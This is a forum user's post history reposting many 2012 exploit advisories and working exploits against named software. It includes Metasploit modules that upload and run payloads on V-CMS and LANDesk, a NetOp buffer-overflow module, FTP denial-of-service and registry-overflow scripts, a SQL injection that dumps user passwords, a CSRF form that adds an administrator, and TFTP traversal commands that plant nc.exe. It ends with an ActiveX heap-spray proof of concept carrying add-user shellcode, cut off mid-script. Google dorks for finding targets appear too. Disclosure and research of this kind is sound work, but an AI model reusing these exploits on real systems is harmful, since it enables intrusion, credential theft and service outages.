-
Posts
425 -
Joined
-
Last visited
-
Days Won
2
Posts posted by The_Arhitect
-
-
IrfanView FlashPix PlugIn Decompression Heap Overflow
#####################################################################################
Application: IrfanView FlashPix PlugIn Decompression Heap Overflow
Platforms: Windows
Secunia Number: SA48772
{PRL}: 2012-08
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Timeline
3) Technical details
4) PoC
#####################################################################################
===============
1) Introduction
===============
IrfanView is a freeware/shareware image viewer for Microsoft Windows that can view, edit, and convert image files
and play video/audio files. It is noted for its small size, speed, ease of use, and ability to handle a wide variety of graphic
file formats, and has some image creation and painting capabilities. The software was first released in 1996.
IrfanView is free for non-commercial use; commercial use requires paid registration.
#####################################################################################
============
2) Timeline
============
2012-04-06 - Vulnerability reported to secunia
2012-04-13 - Coordinated public release of advisory
#####################################################################################
=================
3) Technical details
=================
The vulnerability is caused due to insufficient validation when decompressing FlashPix images
and can be exploited to cause a heap-based buffer overflow via a specially crafted FPX file.
#####################################################################################
=============
4) The PoC
=============
http://www.exploit-db.com/sploits/18739.fpx
###############################################################################Sursa: IrfanView FlashPix PlugIn Decompression Heap Overflow
-
V-CMS PHP File Upload and Execute
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "V-CMS PHP File Upload and Execute",
'Description' => %q{
This module exploits a vulnerability found on V-CMS's inline image upload feature.
The problem is due to the inline_image_upload.php file not checking the file type
before saving it on the web server. This allows any malicious user to upload a
script (such as PHP) without authentication, and then execute it with a GET request.
The issue is fixed in 1.1 by checking the extension name. By default, 1.1 only
allows jpg, jpeg, png, gif, bmp, but it is still possible to upload a PHP file as
one of those extension names, which may still be leveraged in an attack.
},
'License' => MSF_LICENSE,
'Author' =>
[
'AutoSec Tools', #Initial discovery
'sinn3r' #Metasploit
],
'References' =>
[
['CVE', '2011-4828'],
['BID', '50706'],
['URL', 'http://bugs.v-cms.org/view.php?id=53'],
['URL', 'http://xforce.iss.net/xforce/xfdb/71358']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['V-CMS 1.0', {}],
],
'Privileged' => false,
'DisclosureDate' => "Nov 27 2011", #When the ticket was created
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to dolibarr', '/vcms/'])
], self.class)
end
def check
res = send_request_raw({
'uri' => target_uri.path,
'method' => 'GET'
})
if res and res.body =~ /V\-CMS v1\.[0-1]/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def on_new_session(client)
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
client.fs.file.rm(@payload_name)
else
client.shell_command_token("rm #{@payload_name}")
end
end
def exploit
peer = "#{rhost}:#{rport}"
base = target_uri.path
base << '/' if base[-1,1] != '/'
@payload_name = "#{rand_text_alpha(5)}.php"
p = %Q|<?php
#{payload.encoded}
?>
|
p = p.gsub(/^\t\t/, '')
post_data = "------x\r\n"
post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n"
post_data << "Content-Type: image/gif\r\n"
post_data << "\r\n"
post_data << p
post_data << "------x--\r\n"
print_status("#{peer} Uploading payload: #{@payload_name}")
res = send_request_cgi({
'uri' => "#{base}includes/inline_image_upload.php",
'method' => 'POST',
'ctype' => 'multipart/form-data; boundary=----x',
'data' => post_data
})
if res
print_status("#{peer} replies status: #{res.code.to_s}")
else
print_error("#{peer} No response from server. Will not continue")
return
end
print_status("#{peer} Executing payload: #{@payload_name}")
res = send_request_raw({
'uri' => "#{base}temp/#{@payload_name}",
'method' => 'GET'
})
if res and res.code == 404
print_error("#{peer} 404 - the upload probably failed")
return
end
handler
end
end -
EMC IRM License Server DoS Server 4.6.1.1995
#######################################################################
Luigi Auriemma
Application: EMC IRM License Server
http://www.emc.com
Versions: <= 4.6.1.1995
Platforms: Windows
Bugs: A] "version compat check" *FIPS NULL pointer
B] freezing caused by multiple commands
C] NULL pointer caused by commands after invalid version
Exploitation: remote
Date: 10 Apr 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From the manual:
"The IRM Server is a secure server containing a database that stores
the encryption keys needed by authorized users to access protected
content. The database also stores policies that specify who can access
the information and what they can do with it."
#######################################################################
=======
2) Bugs
=======
--------------------------------------------
A] "version compat check" *FIPS NULL pointer
--------------------------------------------
The missing *FIPS fields in the "version compat check" command leads to
a NULL pointer in execution:
004AB67B . 8D45 E4 LEA EAX,DWORD PTR SS:[EBP-1C]
004AB67E . 50 PUSH EAX
004AB67F . 53 PUSH EBX
004AB680 . 8D85 5C020000 LEA EAX,DWORD PTR SS:[EBP+25C]
004AB686 . 50 PUSH EAX
004AB687 . FF75 C4 PUSH DWORD PTR SS:[EBP-3C]
004AB68A . FF55 E8 CALL DWORD PTR SS:[EBP-18] ; NULL pointer
---------------------------------------
B] freezing caused by multiple commands
---------------------------------------
Process freezing caused by some continuous malformed commands, for
example "batch begin untethered" with an Id composed by line-feeds.
Note about the proof-of-concept: manually kill the PoC when everything
seems inactive and you no longer receive data from the server so that
it will start to consume resources.
--------------------------------------------------------
C] NULL pointer caused by commands after invalid version
--------------------------------------------------------
Looks like it's possible to cause some NULL pointer dereferences if the
initial "version compat check" contains an invalid Version and then are
sent other commands.
The effect of all the vulnerabilities is the impossibility of using the
IRM server, the pvcontrol.exe process remains active but it's no longer
usable.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/poc/irm_1.zip
#######################################################################
======
4) Fix
======
No fix.
####################################################################### -
Software DEP Classified Script 2.5 SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Software DEP Classified Script 2.5 SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Author: h0rd
Contact: h0rd[at]null.net
homepage: http://h0rd.net
download: http://www.softwaredep.com/classified-script.html
Price: $199
PoC exploit:
http://[host]/ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user--
login page:
http://[host]/[script]/admin/Sursa: Software DEP Classified Script 2.5 SQL Injection Vulnerability
-
-
BulletProof FTP Client 2010 - Buffer Overflow Vulnerability
Title:
======
BulletProof FTP Client 2010 - Buffer Overflow Vulnerability
Date:
=====
2012-04-02
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=475
VL-ID:
=====
475
Introduction:
=============
BPFTP Client is a fully automated FTP client, with many advanced features including automatic download resuming,
leech mode, ftp search and much more. Perfect for personal or corporate Webmasters as well as for Software and Music traders.
Features:
+ Automatic Resume/Reconnect
+ Browse Offline with Cache
+ Leech Mode
+ Hidden File Support
+ Download Credit/Ratio Support
+ Clipboard Monitor
+ Queue 1,000s of Actions
+ Proxy/Firewall Support
+ HTTP/Webserver Support
+ Import CuteFTP, WS_FTP, FTP Explorer
+ Remote Mirroring
+ Search and Filter Ability
(Copy of the Vendor Homepage: http://www.bpftp.com )
Abstract:
=========
A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on BulletProof FTP Client v2010.75.0.76
Report-Timeline:
================
2012-03-14: Vendor Notification
2012-03-16: Vendor Response/Feedback
2012-04-02: Public or Non-Public Disclosure
Status:
========
Published
Affected Products:
==================
BulletProof
Product: BPFTP Client Software (Windows) v2010.75.0.76 & 2011.x
Exploitation-Technique:
=======================
Local
Severity:
=========
High
Details:
========
A Buffer Overflow vulnerability is detected on BulletProof FTP Client v2010.75.0.76 (current version). The vulnerability is located
in the main executeable bpftpclient.exe. During the start of the application the value LogFileName from the
registry key [HKEY_CURRENT_USER/Software/BulletProof Software/BulletProof FTP Client 2010/Options] is read.
When inserting an oversized value to the registry value a buffer overflow is triggered. The victim only needs to start the application.
Vulnerable Module(s):
[+] bpftpclient.exe
--- Debugger Logs ---
# 42424242: The instruction at 0x42424242 referenced memory at 0x42424242.
The memory could not be read -> 42424242 (exc.code c0000005, tid 2264)
# Registers:
# EAX 00000000
# ECX 42424242
# EDX 7C9132BC ntdll.7C9132BC
# EBX 00000000
# ESP 0012F594
# EBP 0012F5B4
# ESI 00000000
# EDI 00000000
# EIP 42424242
# Stack:
# 0012F588 00140198
# 0012F58C 7C91D80A ntdll.7C91D80A
# 0012F590 7C9601E1 ntdll.7C9601E1
# 0012F594 7C9132A8 RETURN to ntdll.7C9132A8
# 0012F598 0012F67C
# 0012F59C 0012FBCC ASCII ``AAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC``
# 0012F5A0 0012F698
# Dump:
# 0012FBB4 41 41 41 41 41 41 41 41 AAAAAAAA
# 0012FBBC 41 41 41 41 41 41 41 41 AAAAAAAA
# 0012FBC4 41 41 41 41 41 41 41 41 AAAAAAAA
# 0012FBCC 41 41 41 41 42 42 42 42 AAAABBBB
# 0012FBD4 43 43 43 43 43 43 43 43 CCCCCCCC
# 0012FBDC 43 43 43 43 43 43 43 43 CCCCCCCC
# 0012FBE4 43 43 43 43 43 43 43 43 CCCCCCCC
Picture(s):
../1.png
../2.png
Proof of Concept:
=================
The vulnerability can be exploited by local attackers. Successful exploitation requires no user inter action. For demonstration or reproduce ...
#!/usr/bin/python
# Exploit Title: BulletProof FTP Client v2010.75.0.76 Local Buffer Overflow
# Version: 2010.75.0.76
# Date: 2012-03-11
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.bpftp.com/
# Tested on: Windows XP SP3 Professional German
# Notes: -
# Howto: Import Reg -> Start App
file="poc.reg"
junk1="\x41" * 448
boom="\x42\x42\x42\x42"
junk2="\x43" * 100
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client 2010\Options]\n"
poc=poc + "\"LogFileName\"=\"" + junk1 + boom + junk2 + "\""
try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";
Risk:
=====
The security risk of the local buffer overflow vulnerability is estimated as high(+).
Credits:
========
Vulnerability Research Laboratory - Julien Ahrens (MrTuxracer) [www.inshell.net]
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.
Copyright ? 2012|Vulnerability-Lab
--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@vulnerability-lab.comSursa: BulletProof FTP Client 2010 - Buffer Overflow Vulnerability
-
Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
# Exploit Title: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
# Date: 7/4/2012
# Author: Dr.NaNo
# Software Link: http://www.utopiasoftware.net/newspro/dl.php?filename=newspro140b.zip&mirror=1
# Version: 1.4.0
# Tested on: Linux-Red-Hat
# Google Dork: Powered By Utopia News Pro 1.4.0
#
########################################################
# ~ Exploit ~ #
########################################################
<html>
<body>
<form action="http://localhost/{PATh}/upload/users.php" method="post" />
<input type="hidden" name="username" value="NANO" />
<input type="hidden" name="groupid" value="1" />
<input type="hidden" name="password" value="102030" />
<input type="hidden" name="password2" value="102030" />
<input type="hidden" name="email" value="security@security.com" />
<input type="submit" name="submitnew" accesskey="s" value="ThankS !" />
</form>
</body>
</html>
#### ~ Greetz ~ #########################################################
# #
# Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020 #
# #
# JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng #
# #
############################################### ~ All FriendS ~ #########Sursa: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
-
Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability
# Exploit Title: Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability
# Date: April 8, 2012
# Software Link: http://www.distinct.com/index.php/downloads/index/p=ISERV
# Affected Versions: 3.01 and previous version may also affected
# Tested on: Windows XP SP3, Windows Server 2003 , Windows 7 SP1
Software Description
--------------------
Distinct Intranet Servers, which includes FTP Server, TFTP, LPD, BOOTP and NFS, bring quality server power to your network with no additional hardware investment. These servers allow you to make use of your PCs to share important services among your users.
Vulnerability Details
---------------------
The vulnerability is caused due to improper validation to GET and PUT Request containing dot dot slash ('../') sequences, which allows attackers to read or write arbitrary files.
Attack Vector
-------------
By requesting a dot dot slash within the GET or PUT request, it is possible to retrieve operating system file such as boot.ini or upload file (errh, nc.exe?) to Windows %systemroot% (C:\WINDOWS\system32\).
Impact
------
Read and write files from remote machine.
Proof of Concept
----------------
We assume that the directory is deep enough, so you have to set a deep path on the server configuration. If a GET request followed with '../../' (dot dot slash), trying to retrieve boot.ini file, is sent to Distinct TFTP Server 3.01, the file will be retrieved successfully.
hell:~ modpr0be$ tftp -e 10.211.55.5 69
tftp> get ../../../../../../../../../../../../../boot.ini
Received 211 bytes in 0.0 seconds
tftp>
Next, if we try to upload a file, let say Netcat (nc.exe), to Windows %systemroot% directory (C:\WINDOWS\system32\) using a PUT command, here is the result:
hell:~ modpr0be$ tftp -e 10.211.55.5 69
tftp> put /Pentest/backdoor/nc.exe ../../../../../../../../../../../../../../../Windows/system32/nc.exe
Sent 59392 bytes in 0.3 seconds
tftp>
Netcat successfully uploaded.
Another combinations:
tftp> get ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
tftp> put /Pentest/backdoor/nc.exe ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\nc.exe
Solution Status
---------------
Unavailable
Risk Factor
-----------
CVSS Base Score = 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Exploitability Subscore = 10
Impact Subscore = 4.9
CVSS Temporal Score = 5.2
Overall CVSS Score = 5.8
Risk factor = Medium
Credits
-------
Tom Gregory from Spentera Research
References
----------
http://www.spentera.com/advisories/2012/SPN-01-2012.pdf
Disclosure Timeline
-------------------
March 28, 2012, issue discovered
March 28, 2012, vendor contacted about the issue, no response
April 9, 2012, public advisory releasedSursa: Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability
-
LANDesk Lenovo ThinkManagement Console Remote Command Execution
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize
super(
'Name' => 'LANDesk Lenovo ThinkManagement Console Remote Command Execution',
'Description' => %q{
This module can be used to execute a payload on LANDesk Lenovo
ThinkManagement Suite 9.0.2 and 9.0.3.
The payload is uploaded as an ASP script by sending a specially crafted
SOAP request to "/landesk/managementsuite/core/core.*********/ServerSetup.asmx"
, via a "RunAMTCommand" operation with the command '-PutUpdateFileCore'
as the argument.
After execution, the ASP script with the payload is deleted by sending
another specially crafted SOAP request to "WSVulnerabilityCore/VulCore.asmx"
via a "SetTaskLogByFile" operation.
},
'Author' => [
'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC
'juan vazquez' # Metasploit module
],
'Version' => '$Revision: $',
'Platform' => 'win',
'References' =>
[
['CVE', '2012-1195'],
['CVE', '2012-1196'],
['OSVDB', '79276'],
['OSVDB', '79277'],
['BID', '52023'],
['URL', 'http://www.exploit-db.com/exploits/18622/'],
['URL', 'http://www.exploit-db.com/exploits/18623/']
],
'Targets' =>
[
[ 'LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2', { } ],
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Feb 15 2012'
)
register_options(
[
OptString.new('PATH', [ true, "The URI path of the LANDesk Lenovo ThinkManagement Console", '/'])
], self.class)
end
def exploit
peer = "#{rhost}:#{rport}"
# Generate the ASP containing the EXE containing the payload
exe = generate_payload_exe
asp = Msf::Util::EXE.to_exe_asp(exe)
# htmlentities like encoding
asp = asp.gsub("&", "&").gsub("\"", """).gsub("'", "'").gsub("<", "<").gsub(">", ">")
uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/")
upload_random = rand_text_alpha(rand(6) + 6)
upload_xml_path = "ldlogon\\#{upload_random}.asp"
soap = <<-eos
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<RunAMTCommand xmlns="http://tempuri.org/">
<Command>-PutUpdateFileCore</Command>
<Data1>#{rand_text_alpha(rand(4) + 4)}</Data1>
<Data2>#{upload_xml_path}</Data2>
<Data3>#{asp}</Data3>
<ReturnString>#{rand_text_alpha(rand(4) + 4)}</ReturnString>
</RunAMTCommand>
</soap:Body>
</soap:Envelope>
eos
#
# UPLOAD
#
attack_url = uri_path + "landesk/managementsuite/core/core.*********/ServerSetup.asmx"
print_status("#{peer} - Uploading #{asp.length} bytes through #{attack_url}...")
res = send_request_cgi({
'uri' => attack_url,
'method' => 'POST',
'ctype' => 'text/xml; charset=utf-8',
'headers' => {
'SOAPAction' => "\"http://tempuri.org/RunAMTCommand\"",
},
'data' => soap,
}, 20)
if (! res)
print_status("#{peer} - Timeout: Trying to execute the payload anyway")
elsif (res.code < 200 or res.code >= 300)
print_error("#{peer} - Upload failed on #{attack_url} [#{res.code} #{res.message}]")
return
end
#
# EXECUTE
#
upload_path = uri_path + "ldlogon/#{upload_random}.asp"
print_status("#{peer} - Executing #{upload_path}...")
res = send_request_cgi({
'uri' => upload_path,
'method' => 'GET'
}, 20)
if (! res)
print_error("#{peer} - Execution failed on #{upload_path} [No Response]")
return
end
if (res.code < 200 or res.code >= 300)
print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]")
return
end
#
# DELETE
#
soap = <<-eos
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<SetTaskLogByFile xmlns="http://tempuri.org/">
<computerIdn>1</computerIdn>
<taskid>1</taskid>
<filename>../#{upload_random}.asp</filename>
</SetTaskLogByFile>
</soap:Body>
</soap:Envelope>
eos
attack_url = uri_path + "WSVulnerabilityCore/VulCore.asmx"
print_status("#{peer} - Deleting #{upload_path} through #{attack_url}...")
res = send_request_cgi({
'uri' => attack_url,
'method' => 'POST',
'ctype' => 'text/xml; charset=utf-8',
'headers' => {
'SOAPAction' => "\"http://tempuri.org/SetTaskLogByFile\"",
},
'data' => soap,
}, 20)
if (! res)
print_error("#{peer} - Deletion failed at #{attack_url} [No Response]")
return
elsif (res.code < 200 or res.code >= 300)
print_error("#{peer} - Deletion failed at #{attack_url} [#{res.code} #{res.message}]")
return
end
handler
end
endSursa: LANDesk Lenovo ThinkManagement Console Remote Command Execution
-
NetOp Remote Control Client 9.5 Buffer Overflow',
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'NetOp Remote Control Client 9.5 Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.
When opening a .dws file containing a specially crafted string longer then 520
characters will allow an attacker to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ruben Alejandro "chap0"',
],
'References' =>
[
[ 'OSVDB', '72291' ],
[ 'URL', 'http://www.exploit-db.com/exploits/17223/' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process',
'DisablePayloadHandler' => 'true'
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
'StackAdjustment' => -3500
},
'Targets' =>
[
[ 'Windows XP SP3',
{
'Ret' => 0x20d6c32c, # push esp # ret - nrp.DLL
'Offset' => 524
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 28 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.dws']),
], self.class)
end
def exploit
buffer = rand_text(target['Offset'])
buffer << [target.ret].pack('V')
buffer << make_nops(30)
buffer << payload.encoded
file_create(buffer)
end
end -
KnFTPd 1.0.0 'FEAT' DoS PoC-Exploit
#!/usr/bin/perl
#################################################################################
# Advisory: KnFTPd 1.0.0 'FEAT' DoS PoC-Exploit
# Author: Stefan Schurtz
# Affected Software: Successfully tested on KnFTPd 1.0.0
# Vendor URL: http://knftp.sourceforge.net/
# Vendor Status: informed
# CVE-ID: -
# PoC-Version: 1.0
#################################################################################
use strict;
use Net::FTP;
my $user = "system";
my $password = "secret";
########################
# connect
########################
my $target = $ARGV[0];
my $plength = $ARGV[1];
print "\n";
print "\t#######################################################\n";
print "\t# This PoC-Exploit is only for educational purpose!!! #\n";
print "\t#######################################################\n";
print "\n";
if (!$ARGV[0]||!$ARGV[1]) {
print "[+] Usage: $@ <target> <payload length>\n";
exit 1;
}
my $ftp=Net::FTP->new($target,Timeout=>12) or die "Cannot connect to $target: $@";
print "[+] Connected to $target\n";
########################
# login
########################
$ftp->login($user,$password) or die "Cannot login ", $ftp->message;
print "[+] Logged in with user $user\n";
###################################################
# Building payload './A' with min. length of 94
##################################################
my @p = ( "","./A" );
my $payload;
print "[+] Building payload\n";
for (my $i=1;$i<=$plength;$i++) {
$payload .= $p[$i];
push(@p,$p[$i]);
}
sleep(3);
#########################################
# Sending payload
#########################################
print "[+] Sending payload [$payload]\n";
$ftp->quot('FEAT ' ."$payload");
##########################################
# disconnect
##########################################
print "[+] Done\n";
$ftp->quit;
exit 0;
#EOF -
PicoPublisher v2.0 Remote SQL Injection
# Exploit Title : PicoPublisher v2.0 Remote SQL injection
# Date : 29/03/2012
# Author : ZeTH
# Contact : zeth/at/hacktheplan8/dot/com http://www.hacktheplan8.com
# Vendor : Pico Software
# Site : http://pico.no/
# Version : 2.0
# Price : $29,00
# Dork : intext:"Drives med PicoPublisher"
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
--[1]-- Introduction
PicoPublisher business software
PicoPublisher is a product from Pico Software
[Manage your website]
PicoPublisher makes it easy to manage your website. With the built in
templates you can add columns, slideshows, tabs, boxes and videos
directly from the text editor.
[Manage your customers]
CRM systems are often too expensive for small businesses. With
PicoPublisher you can manage your customers just as easy as your
website. And at the same place!
[Create invoices]
Create professional PDF invoices in seconds. Add products to the
database and insert products to the invoice directly. You will get
notifications when invoices are overdue.
--[2]-- Vulnerability
Files :
[+] page.php
[+] single.php
Attack Method : Remote SQL injection
POC :
[+] http://site/page.php?id=SQLi
[+] http://site/single.php?id=SQLi
Tables :
+-------------------+
| customers
| expenses
| gallery_category
| gallery_photos
| invoice_reminders
| invoices
| invoices_product
| menu_items
| menus
| notes
| options
| orders
| orders_product
| pages
| pico_comments
| pico_config
| pico_karma_voted
| posts
| product_list
| users
+-------------------+
--[3]-- Greetz
hacktheplan8 [hellcome to new friends kasp3r, Pitung]
MainHack Brotherhood, Kecoak Elektronik, Echo
packetstormsecurity, exploit-db, 1337day
Paman, Vrs-hCk, OoN_BoY, em|nem, [S]hiro, Martin, xshadow, ElDiablo,
Furkan, pizzyroot, H312Y -
Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution
Quest InTrust 10.4.x Annotation Objects ActiveX Control
AnnotateX.dll Uninitialized Pointer Remote Code Execution
homepage: http://www.quest.com/intrust/
description: "InTrust securely collects, stores, reports and
alerts on event log data from Windows, Unix and Linux systems,
helping you comply with external regulations, internal policies
and security best practices."
download url of a test version:
http://www.quest.com/downloads/
file tested: Quest_InTrust---Full-Package_104.zip
Background:
The mentioned product installs an ActiveX control
with the following settings:
binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
According to the IObjectSafety interface it is
safe for scripting and safe for initialization, so
Internet Explorer will allow scripting of this control
from remote.
Vulnerability:
By invoking the Add() method is
possible to call inside a memory region of choice
set by the attacker through ex. heap spray or other
tecniques.
Example code:
<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' />
</object>
<script>
obj.Add(0x76767676,1);
</script>
...
eax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001
eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
ANNOTA_1+0xae62:
4400ae62 ff1485504a0244 call dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=????????
...
You are in control of eax: fully exploitable.
As attachment, proof of concept code.
<!--
Quest InTrust 10.4.x Annotation Objects ActiveX Control
(ANNOTATEX.DLL) Uninitialized Pointer Remote Code Execution PoC
(ie7)
binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' />
</object>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
